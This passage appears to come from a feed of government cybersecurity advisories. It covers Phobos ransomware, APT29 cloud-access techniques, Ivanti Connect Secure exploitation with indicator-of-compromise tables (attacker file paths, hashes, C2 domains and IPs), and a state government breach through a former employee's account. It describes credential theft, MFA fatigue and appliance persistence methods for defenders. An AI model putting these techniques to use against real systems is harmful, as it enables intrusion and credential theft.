Phobos threat actors used |
|
Ingress Tool Transfer |
Phobos ransomware extracts its final payload from the hashed file. |
|
Remote Access Software |
Phobos threat actors used remote access tools to establish a remote connection within victim’s network. |
Technique Title | ID | Use |
---|---|---|
Exfiltration |
Phobos threat actors may use exfiltration techniques to steal data from your network. |
|
Exfiltration Over Alternative Protocol |
Phobos threat actors use software to export files to a cloud. |
|
Exfiltration to Cloud Storage |
Phobos threat actors use |
Technique Title | ID | Use |
---|---|---|
Data Encrypted for Impact |
Phobos threat actors use the |
|
Inhibit System Recovery |
Phobos threat actors may delete or remove backups to include volume shadow copies from Windows environments to prevent victim data recovery response efforts. |
|
Financial Theft |
Phobos threat actor’s extort victims for financial gain. |
Secure by Design and Default Mitigations:
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.
The FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture against actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Privacy Affairs: “Moral” 8Base Ransomware Targets 2 New Victims
[2] VMware: 8base ransomware: A Heavy Hitting Player
[3] Infosecurity Magazine: Phobos Ransomware Family Expands With New FAUST Variant
[4] The Record: Hospitals offline across Romania following ransomware attack on IT platform
[5] Comparitech: What is Phobos Ransomware & How to Protect Against It?
[6] Cisco Talos: Understanding the Phobos affiliate structure and activity
[7] Cisco Talos: A deep dive into Phobos ransomware, recently deployed by 8Base group
[8] Malwarebytes Labs: A deep dive into Phobos ransomware
[9] Any Run: Smokeloader
[10] Malpedia: Smokeloader
[11] Truesec: A case of the FAUST Ransomware
[12] VirusTotal: Phobos Domain #1
[13] VirusTotal: Phobos executable: Ahpdate.exe
[14] VirusTotal: Phobos GUI extension: ELF File
[15] VirusTotal: Phobos IP address: 185.202.0[.]111
[16] VirusTotal: Phobos GUI extension: Binary File
[17] Cisco Talos GitHub: IOCs/2023/11/deep-dive-into-phobos-ransomware.txt at main
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom-note, communications with Phobos actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.
The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870.
The FBI does not conduct its investigative activities or base attribution solely on activities protected by the First Amendment. Your company has no obligation to respond or provide information back to the FBI in response to this engagement. If, after reviewing the information, your company decides to provide referral information to the FBI, it must do so in a manner consistent with federal law. The FBI does not request or expect your company to take any particular action regarding this information other than holding it in confidence due to its sensitive nature.
The information in this report is being provided “as is” for informational purposes only. The FBI and CISA not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, and the MS-ISAC.
The California Joint Regional Intelligence Center (JRIC, CA) and Israel National Cyber Directorate (INCD) contributed to this CSA.
February 29, 2024: Initial version.
]]>This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear.
The UK National Cyber Security Centre (NCSC) and international partners assess that APT29 is a cyber espionage group, almost certainly part of the SVR, an element of the Russian intelligence services. The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and New Zealand Government Communications Security Bureau (GCSB) agree with this attribution and the details provided in this advisory.
This advisory provides an overview of TTPs deployed by the actor to gain initial access into the cloud environment and includes advice to detect and mitigate this activity.
To download the PDF version of this report, click here.
The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain. It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.
SVR actors are also known for:
As organizations continue to modernize their systems and move to cloud-based infrastructure, the SVR has adapted to these changes in the operating environment.
They have to move beyond their traditional means of initial access, such as exploiting software vulnerabilities in an on-premises network, and instead target the cloud services themselves.
To access the majority of the victims’ cloud hosted network, actors must first successfully authenticate to the cloud provider. Denying initial access to the cloud environment can prohibit SVR from successfully compromising their target. In contrast, in an on-premises system, more of the network is typically exposed to threat actors.
Below describes in more detail how SVR actors are adapting to continue their cyber operations for intelligence gain. These TTPs have been observed in the last 12 months.
Previous SVR campaigns reveal the actors have successfully used brute forcing [T1110] and password spraying to access service accounts. This type of account is typically used to run and manage applications and services. There is no human user behind them so they cannot be easily protected with multi-factor authentication (MFA), making these accounts more susceptible to a successful compromise. Service accounts are often also highly privileged depending on which applications and services they’re responsible for managing. Gaining access to these accounts provides threat actors with privileged initial access to a network, to launch further operations.
SVR campaigns have also targeted dormant accounts belonging to users who no longer work at a victim organization but whose accounts remain on the system [T1078.004].
Following an enforced password reset for all users during an incident, SVR actors have also been observed logging into inactive accounts and following instructions to reset the password. This has allowed the actor to regain access following incident response eviction activities.
Account access is typically authenticated by either username and password credentials or system-issued access tokens. The NCSC and partners have observed SVR actors using tokens to access their victims’ accounts, without needing a password [T1528].
The default validity time of system-issued tokens varies dependent on the system; however, cloud platforms should allow administrators to adjust the validity time as appropriate for their users. More information can be found on this in the mitigations section of this advisory.
On multiple occasions, the SVR have successfully bypassed password authentication on personal accounts using password spraying and credential reuse. SVR actors have also then bypassed MFA through a technique known as “MFA bombing” or “MFA fatigue,” in which the actors repeatedly push MFA requests to a victim’s device until the victim accepts the notification [T1621].
Once an actor has bypassed these systems to gain access to the cloud environment, SVR actors have been observed registering their own device as a new device on the cloud tenant [T1098.005]. If device validation rules are not set up, SVR actors can successfully register their own device and gain access to the network.
By configuring the network with device enrollment policies, there have been instances where these measures have defended against SVR actors and denied them access to the cloud tenant.
As network-level defenses improve detection of suspicious activity, SVR actors have looked at other ways to stay covert on the internet. A TTP associated with this actor is the use of residential proxies [T1090.002]. Residential proxies typically make traffic appear to originate from IP addresses within internet service provider (ISP) ranges used for residential broadband customers and hide the true source. This can make it harder to distinguish malicious connections from typical users. This reduces the effectiveness of network defenses that use IP addresses as indicators of compromise, and so it is important to consider a variety of information sources such as application and host-based logging for detecting suspicious activity.
The SVR is a sophisticated actor capable of carrying out a global supply chain compromise such as the 2020 SolarWinds, however the guidance in this advisory shows that a strong baseline of cyber security fundamentals can help defend from such actors.
For organizations that have moved to cloud infrastructure, a first line of defense against an actor such as SVR should be to protect against SVR’s TTPs for initial access. By following the mitigations outlined in this advisory, organizations will be in a stronger position to defend against this threat.
Once the SVR gain initial access, the actor is capable of deploying highly sophisticated post compromise capabilities such as MagicWeb, as reported in 2022. Therefore, mitigating against the SVR’s initial access vectors is particularly important for network defenders.
CISA have also produced guidance through their Secure Cloud Business Applications (SCuBA) Project which is designed to protect assets stored in cloud environments.
Some of the TTPs listed in this report, such as residential proxies and exploitation of system accounts, are similar to those reported as recently as January 2024 by Microsoft.
This report has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.
Tactic | ID | Technique | Procedure |
---|---|---|---|
Credential Access |
Brute Force |
The SVR use password spraying and brute forcing as an initial infection vector. |
|
Initial Access |
Valid Accounts: Cloud Accounts |
The SVR use compromised credentials to gain access to accounts for cloud services, including system and dormant accounts. |
|
Credential Access |
Steal Application Access Token |
The SVR use stolen access tokens to login to accounts without the need for passwords. |
|
Credential Access |
Multi-Factor Authentication Request Generation |
The SVR repeatedly push MFA requests to a victim’s device until the victim accepts the notification, providing SVR access to the account. |
|
Command and Control |
Proxy: External Proxy |
The SVR use open proxies in residential IP ranges to blend in with expected IP address pools in access logs. |
|
Persistence |
Account Manipulation: Device Registration |
The SVR attempt to register their own device on the cloud tenant after acquiring access to accounts. |
A number of mitigations will be useful in defending against the activity described in this advisory:
This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times.
This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation.
Refer any FOIA queries to ncscinfoleg@ncsc.gov.uk.
All material is UK Crown Copyright.
]]>The Cybersecurity and Infrastructure Security Agency (CISA) and the following partners (hereafter referred to as the authoring organizations) are releasing this joint Cybersecurity Advisory to warn that cyber threat actors are exploiting previously identified vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways. CISA and authoring organizations appreciate the cooperation of Volexity, Ivanti, Mandiant and other industry partners in the development of this advisory and ongoing incident response activities. Authoring organizations:
Of particular concern, the authoring organizations and industry partners have determined that cyber threat actors are able to deceive Ivanti’s internal and external Integrity Checker Tool (ICT), resulting in a failure to detect compromise.
Cyber threat actors are actively exploiting multiple previously identified vulnerabilities—CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893—affecting Ivanti Connect Secure and Ivanti Policy Secure gateways. The vulnerabilities impact all supported versions (9.x and 22.x) and can be used in a chain of exploits to enable malicious cyber threat actors to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.
During multiple incident response engagements associated with this activity, CISA identified that Ivanti’s internal and previous external ICT failed to detect compromise. In addition, CISA has conducted independent research in a lab environment validating that the Ivanti ICT is not sufficient to detect compromise and that a cyber threat actor may be able to gain root-level persistence despite issuing factory resets.
The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available. If a potential compromise is detected, organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.
Based upon the authoring organizations’ observations during incident response activities and available industry reporting, as supplemented by CISA’s research findings, the authoring organizations recommend that the safest course of action for network defenders is to assume a sophisticated threat actor may deploy rootkit level persistence on a device that has been reset and lay dormant for an arbitrary amount of time. For example, as outlined in PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure), sophisticated actors may remain silent on compromised networks for long periods. The authoring organizations strongly urge all organizations to consider the significant risk of adversary access to, and persistence on, Ivanti Connect Secure and Ivanti Policy Secure gateways when determining whether to continue operating these devices in an enterprise environment.
Note: On February 9, 2024, CISA issued Emergency Directive (ED) 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch (FCEB) agencies to perform specific actions on affected products.
The Canadian Centre for Cyber Security also issued an alert, Ivanti Connect Secure and Ivanti Policy Secure gateways zero-day vulnerabilities, which provides periodic updates for IT professionals and managers affected by the Ivanti vulnerabilities.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques in Appendix C for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
On January 10, 2024, Volexity reported on two vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways observed being chained to achieve unauthenticated remote code execution (RCE):[1]
Volexity first identified active exploitation in early December 2023, when they detected suspicious lateral movement [TA0008] on the network of one of their network security monitoring service customers. Volexity identified that threat actors exploited the vulnerabilities to implant web shells, including GLASSTOKEN and GIFTEDVISITOR, on internal and external-facing web servers [T1505.003]. Once successfully deployed, these web shells are used to execute commands on compromised devices.[1]
After Ivanti provided initial mitigation guidance in early January, threat actors developed a way to bypass those mitigations to deploy BUSHWALK, LIGHTWIRE, and CHAINLINE web shell variants.[2] Following the actors’ developments, Ivanti disclosed three additional vulnerabilities:
CISA has responded to multiple incidents related to the above vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways. In these incidents, actors exploited these CVEs for initial access to implant web shells and to harvest credentials stored on the devices. Post-compromise, the actors moved laterally into domain environments and have been observed leveraging tools that are native to the Ivanti appliances—such as freerdp
, ssh
, telnet
, and nmap
libraries—to expand their access to the domain environment. The result, in some cases, was a full domain compromise.
During incident response investigations, CISA identified that Ivanti’s internal and external ICT failed to detect compromise. The organizations leveraged the integrity checker to identify file mismatches in Ivanti devices; however, CISA incident response analysis confirmed that both the internal and external versions of the ICT were not reliable due to the existence of web shells found on systems that had no file mismatches according to the ICTs. Additionally, forensic analysis showed evidence the actors were able to clean up their efforts by overwriting files, time-stomping files, and re-mounting the runtime partition to return the appliance to a “clean state.” This reinforces that ICT scans are not reliable to indicate previous compromise and can result in a false sense of security that the device is free of compromise.
As detailed in Appendix A, CISA conducted independent research in a lab environment validating that the ICT is likely insufficient for detecting compromise and that a cyber threat actor may be able to maintain root level persistence despite issuing factory resets and appliance upgrades.
See Tables 1 – 4 in Appendix B for IOCs related to cyber actors exploiting multiple CVEs related to Ivanti appliances.
For additional indicators of compromise, see:
Memory and disk forensics were used during forensic analysis, combined with the Integrity Checker Tool, to identify malicious files on the compromised Ivanti Connect Secure VPN appliance. This advisory provides a list of combined authoring organization IOCs and open source files identified by Volexity via network analysis.
Disclaimer: Some IP addresses in this advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action such as blocking. Activity should not be attributed as malicious without analytical evidence to support it is used at the direction of, or controlled by, threat actors.
See Appendix D for additional open source YARA rules, provided by Volexity, that may aid network defenders in detecting malicious activity within Ivanti Connect Secure VPN appliances. For more information on detection methods, visit Mandiant’s blog post Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation or the Volexity GitHub page.
The authoring organizations encourage you to assess your organization’s user interface (UI) software and systems for evidence of compromise and to hunt for malicious activity using signatures outlined within this advisory. If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the Ivanti Connect Secure VPN appliance as well as executing arbitrary code and installing malicious payloads.
Note: These are vendor-managed appliances and systems may be encrypted with limited access. Thus, collecting artifacts may be limited on some versions of appliances. The authoring organizations recommend investigating associated devices on the network to identify lateral movement in the absence of access to the Secure Connect appliance.
If a potential compromise is detected, organizations should:
These mitigations apply to all critical infrastructure organizations and network defenders using Ivanti Connect Secure VPN and Ivanti Policy Secure. The authoring organizations recommend that software manufacturers incorporate Secure by Design principles and tactics into their software development practices. These principles and tactics can limit the impact of exploitation—such as threat actors leveraging newly discovered, unpatched vulnerabilities within Ivanti appliances—thus, strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.
The authoring organizations recommend organizations implement the mitigations below to improve your cybersecurity posture based on threat actor activity and to reduce the risk of compromise associated with Ivanti vulnerabilities. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how the controls perform against the ATT&CK techniques described in this advisory.
To get started:
The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
U.S. organizations should report every potential cyber incident to the U.S. government. When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI’s Internet Crime Complaint Center (IC3), local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.
The FBI encourages organizations to report information concerning suspicious or criminal activity to their local FBI Field Office.
Australian organizations that have been impacted or require assistance regarding Ivanti compromise, contact ASD’s ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
UK organizations that have been impacted by Ivanti compromise, should report the incident to the National Cyber Security Centre.
Organizations outside of the United States or Australia should contact their national cyber center.
The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and authoring organizations.
Volexity, Mandiant, and Ivanti contributed to this advisory.
February 29, 2024: Initial version.
As part of ongoing efforts to effectively serve the cybersecurity community with actionable insights and guidance, CISA conducted research by using a free and downloadable version of the Ivanti Connect Secure virtual appliance to assess potential attack paths and adversary persistence mechanisms. The virtual appliances were not connected to the internet, and were deployed in a closed virtualized network, with a non-internet connected Active Directory. This research included a variety of tests on version 22.3R1 Build 1647
, connected to Active Directory credentials, to leverage the access obtained through CVE-2023-46805, CVE-2024-21887 and CVE-2024-21893. Put simply, CISA’s research team wanted to answer the question: “How far could an attacker go if they set were to exploit these CVEs remotely?”
Leveraging these vulnerabilities, CISA researchers were able to exfiltrate domain administrator cleartext credentials [TA0006], gain root-level persistence [TA0003], and bypass integrity checks used by the Integrity Checker application. CISA’s Incident Response team observed these specific techniques leveraged during the agency’s incident response engagements, along with the native tools and libraries to conduct internal reconnaissance and compromise domains behind the Ivanti appliances. CISA researchers assess that threat actors are able to use the credentials to move deeper into the environment.
The ability to exfiltrate domain administrator cleartext credentials, if saved when adding an “Active Directory Authentication server” during setup, was accomplished by using the root-level access obtained from the vulnerabilities to interface directly with the internal server and retrieve the cached credentials as shown in Figure 4, APPENDIX A. Users who currently have active sessions to the appliance could have their base64 encoded active directory cleartext passwords, in addition to the New Technology LAN Manager (NTLM) password hashes, retrieved with the same access, as shown in Figure 10, APPENDIX A. In addition to users with active sessions, users previously authenticated can have base64 encoded active directory plaintext passwords and NTLM hashes harvested from the backups of the data.mdb database files stored on the appliance, as shown in Figure 15 and 16, APPENDIX A.
The root-level access allows adversaries to maintain persistence despite issuing factory resets and appliance upgrades while deceiving the provided integrity checkers, creating the illusion of a clean installation. Due to the persistence mechanism being stored on the encrypted partition of the drive and inaccurate integrity check results, it is untenable for network administrators to validate their application has not been compromised without also decrypting the partition and validating against a clean installation of the appliance, which are actions not easily accomplished at present. Without major alterations of the integrity checking process, it is conceivable that new vulnerabilities that afford root-level access to the appliance could also result in root-kit level persistence to the appliance.
Below is proof of concept being released by CISA, which demonstrates the capacity of and opportunity for a threat actor to exfiltrate Domain Administrator credentials that were used during appliance configuration:
Below is a demonstration of the capacity for post exploitation exfiltration of base64 encoded cleartext credentials for active directory users and their associated NTLM password hashes:
Filename | Description | Purpose |
/home/perl/DSLogConfig.pm |
Modified Perl module. |
Designed to execute |
/usr/bin/a.sh |
gcore.in core dump script. |
|
/bin/netmon |
Sliver binary. |
|
/home/venv3/lib/python3.6/site-packages/*.egg |
Python package containing WIREFIRE among other files. |
|
/home/etc/sql/dsserver/sessionserver.pl |
Perl script to remount the filesystem with read/write access. |
Make sessionserver.sh executable, execute it, then restore original mount settings. |
/home/etc/sql/dsserver/sessionserver.sh |
Script executed by |
Uses regular expressions to modify |
/home/webserver/htdocs/dana-na/auth/compcheckresult.cgi |
Modified legitimate component of the ICS VPN appliance, with new Perl module imports added and a one-liner to execute commands based on request parameters. |
Allows remote code execution over the Internet if the attacker can craft a request with the correct parameters. |
/home/webserver/htdocs/dana-na/auth/lastauthserverused.js |
Modified legitimate JavaScript component loaded by user login page of the Web SSL VPN component of Ivanti Connect Secure. |
Modified to harvest entered credentials and send them to a remote URL on an attacker-controlled domain. |
Value | Type | Description |
88.119.169[.]227 |
IP Address |
|
103.13.28[.]40 |
IP Address |
|
46.8.68[.]100 |
IPv4 |
|
206.189.208[.]156 |
IP Address |
DigitalOcean IP address tied to UTA0178. |
gpoaccess[.]com |
Hostname |
Suspected UTA0178 domain discovered via domain registration patterns. |
webb-institute[.]com |
Hostname |
Suspected UTA0178 domain discovered via domain registration patterns. |
symantke[.]com |
Hostname |
UTA0178 domain used to collect credentials from compromised devices. |
75.145.243[.]85 |
IP Address |
UTA0178 IP address observed interacting with compromised device. |
47.207.9[.]89 |
IP Address |
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. |
98.160.48[.]170 |
IP Address |
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. |
173.220.106[.]166 |
IP Address |
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. |
73.128.178[.]221 |
IP Address |
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. |
50.243.177[.]161 |
IP Address |
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. |
50.213.208[.]89 |
IP Address |
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. |
64.24.179[.]210 |
IP Address |
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. |
75.145.224[.]109 |
IP Address |
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.
|
50.215.39[.]49 |
IP Address |
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. |
71.127.149[.]194 |
|
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.
|
173.53.43[.]7 |
|
UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. |
Filename | Hash Value | Description |
Cav-0.1-py3.6.egg |
ed4b855941d6d7e07aacf016a2402c4c870876a050a4a547af194f5a9b47945f |
WIREFIRE web shell |
Health.py |
3045f5b3d355a9ab26ab6f44cc831a83 |
CHAINLINE web shell |
compcheckresult.cgi |
3d97f55a03ceb4f71671aa2ecf5b24e9 |
CHAINLINE web shell |
lastauthserverused.js |
2ec505088b942c234f39a37188e80d7a |
LIGHTWIRE web shell |
lastauthserverused.js |
8eb042da6ba683ef1bae460af103cc44 |
WARPWIRE credential harvester variant |
lastauthserverused.js |
a739bd4c2b9f3679f43579711448786f |
WARPWIRE credential harvester variant |
lastauthserverused.js |
a81813f70151a022ea1065b7f4d6b5ab |
WARPWIRE credential harvester variant |
lastauthserverused.js |
d0c7a334a4d9dcd3c6335ae13bee59ea |
WARPWIRE credential harvester variant |
lastauthserverused.js |
e8489983d73ed30a4240a14b1f161254 |
WARPWIRE credential harvester variant |
logo.gif |
N/A — varies |
Configuration and cache dump or CAV web server log exfiltration |
login.gif |
N/A — varies |
Configuration and cache dump |
[a-fA-f0-9]{10.css |
N/A — varies |
Configuration and cache dump |
visits.py |
N/A — varies |
WIREFIRE web shell |
Network Indicator | Type | Description |
symantke[.]com |
Domain |
WARPWIRE C2 server |
miltonhouse[.]nl |
Domain |
WARPWIRE variant C2 server |
entraide-internationale[.]fr |
Domain |
WARPWIRE variant C2 server |
api.d-n-s[.]name |
Domain |
WARPWIRE variant C2 server |
cpanel.netbar[.]org |
Domain |
WARPWIRE variant C2 server |
clickcom[.]click |
Domain |
WARPWIRE variant C2 server |
clicko[.]click |
Domain |
WARPWIRE variant C2 server |
duorhytm[.]fun |
Domain |
WARPWIRE variant C2 server |
line-api[.]com |
Domain |
WARPWIRE variant C2 server |
areekaweb[.]com |
Domain |
WARPWIRE variant C2 server |
ehangmun[.]com |
Domain |
WARPWIRE variant C2 server |
secure-cama[.]com |
Domain |
WARPWIRE variant C2 server |
146.0.228[.]66 |
IPv4 |
WARPWIRE variant C2 server |
159.65.130[.]146 |
IPv4 |
WARPWIRE variant C2 server |
8.137.112[.]245 |
IPv4 |
WARPWIRE variant C2 server |
91.92.254[.]14 |
IPv4 |
WARPWIRE variant C2 server |
186.179.39[.]235 |
IPv4 |
Mass exploitation activity |
50.215.39[.]49 |
IPv4 |
Post-exploitation activity |
45.61.136[.]14 |
IPv4 |
Post-exploitation activity |
173.220.106[.]166 |
IPv4 |
Post-exploitation activity |
Initial Access | ||
---|---|---|
Technique Title |
ID |
Use |
Exploit Public-Facing Applications |
Cyber actors will use custom web shells planted on public facing applications which allows persistence in victims’ environment. |
|
Persistence | ||
Technique Title |
ID |
Use |
Valid Accounts |
Cyber actors leverage compromised accounts to laterally move within internal systems via RDP, SBD, and SSH. |
|
Server Software Component: Web Shell |
Cyber actors may use web shells on internal- and external-facing web servers to establish persistent access to systems. |
|
Execution | ||
Technique Title |
ID |
Use |
Command and Scripting Interpreter: PowerShell |
Cyber actors leverage code execution from request parameters that are decoded from hex to base64 decoded, then passed to Assembly.Load(). Which is used to execute arbitrary powershell commands. |
|
Exploitation for Client Execution |
Cyber actors will exploit software vulnerabilities such as command-injection and achieve unauthenticated remote code execution (RCE). |
|
|
|
|
|
The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) conducted an incident response assessment of a state government organization’s network environment after documents containing host and user information, including metadata, were posted on a dark web brokerage site. Analysis confirmed that an unidentified threat actor compromised network administrator credentials through the account of a former employee—a technique commonly leveraged by threat actors—to successfully authenticate to an internal virtual private network (VPN) access point, further navigate the victim’s on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.[1] Analysis also focused on the victim’s Azure environment, which hosts sensitive systems and data, as well as the compromised on-premises environment. Analysis determined there were no indications the threat actor further compromised the organization by moving laterally from the on-premises environment to the Azure environment.
CISA and MS-ISAC are releasing this Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) used by the threat actor and methods to protect against similar exploitation of both unnecessary and privileged accounts.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actor’s activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
A state government organization was notified that documents containing host and user information, including metadata, were posted on a dark web brokerage site. After further investigation, the victim organization determined that the documents were accessed via the compromised account of a former employee. Threat actors commonly leverage valid accounts, including accounts of former employees that have not been properly removed from the Active Directory (AD), to gain access to organizations.[1] CISA and MS-ISAC assessed that an unidentified threat actor likely accessed documents containing host and user information to post on the dark web for profit after gaining access through the account of a former employee.
The scope of this investigation included the victim organization’s on-premises environment, as well as their Azure environment, which hosts sensitive systems and data. Analysis determined the threat actor did not move laterally from the compromised on-premises network to the Azure environment and did not compromise sensitive systems.
Incident responders collected Azure and Microsoft Defender for Endpoint (MDE) logs using CISA’s Untitled Goose Tool—a free tool to help network defenders detect potentially malicious activity in Microsoft Azure, Azure Active Directory (AAD), and Microsoft 365 (M365) environments. CISA developed the Untitled Goose Tool to export and review AAD sign-in and audit logs, M365 unified audit logs (UAL), Azure activity logs, and MDE data. By exporting cloud artifacts, Untitled Goose Tool supports incident response teams with environments that do not ingest logs into a security information and event management (SIEM) tool.
The logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range. CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim’s VPN [T1133] with the intent to blend in with legitimate traffic to evade detection.
USER1: The threat actor gained initial access through the compromised account of a former employee with administrative privileges (USER1
) [T1078.002] to conduct reconnaissance and discovery activities. The victim organization confirmed that this account was not disabled immediately following the employee’s departure.
USER1
account credentials in a separate data breach due to the credentials appearing in publicly available channels containing leaked account information [T1589.001].USER1
had access to two virtualized servers including SharePoint and the workstation of the former employee. The workstation was virtualized from a physical workstation using the Veeam Physical to Virtual (P2V) function within the backup software.USER2: The threat actor likely obtained the USER2
account credentials from the virtualized SharePoint server managed by USER1
[T1213.002]. The victim confirmed that the administrator credentials for USER2
were stored locally on this server [T1552.001].
USER1
account, as well as from an additional compromised global domain administrator account (USER2
) [T1078.002].USER2
account was impactful due to the access it granted to both the on-premises AD and Azure AD [T1021.007], thus enabling administrative privileges [T1078.004].Following notification of the dark web posting, the victim organization immediately disabled the USER1
account and took the two virtualized servers associated with the former employee offline. The victim also changed the password for the USER2
account and removed administrator privileges. Neither of the administrative accounts had multifactor authentication (MFA) enabled.
Through connection from the VM, the threat actor conducted LDAP queries of the AD, likely using the open source tool AdFind.exe
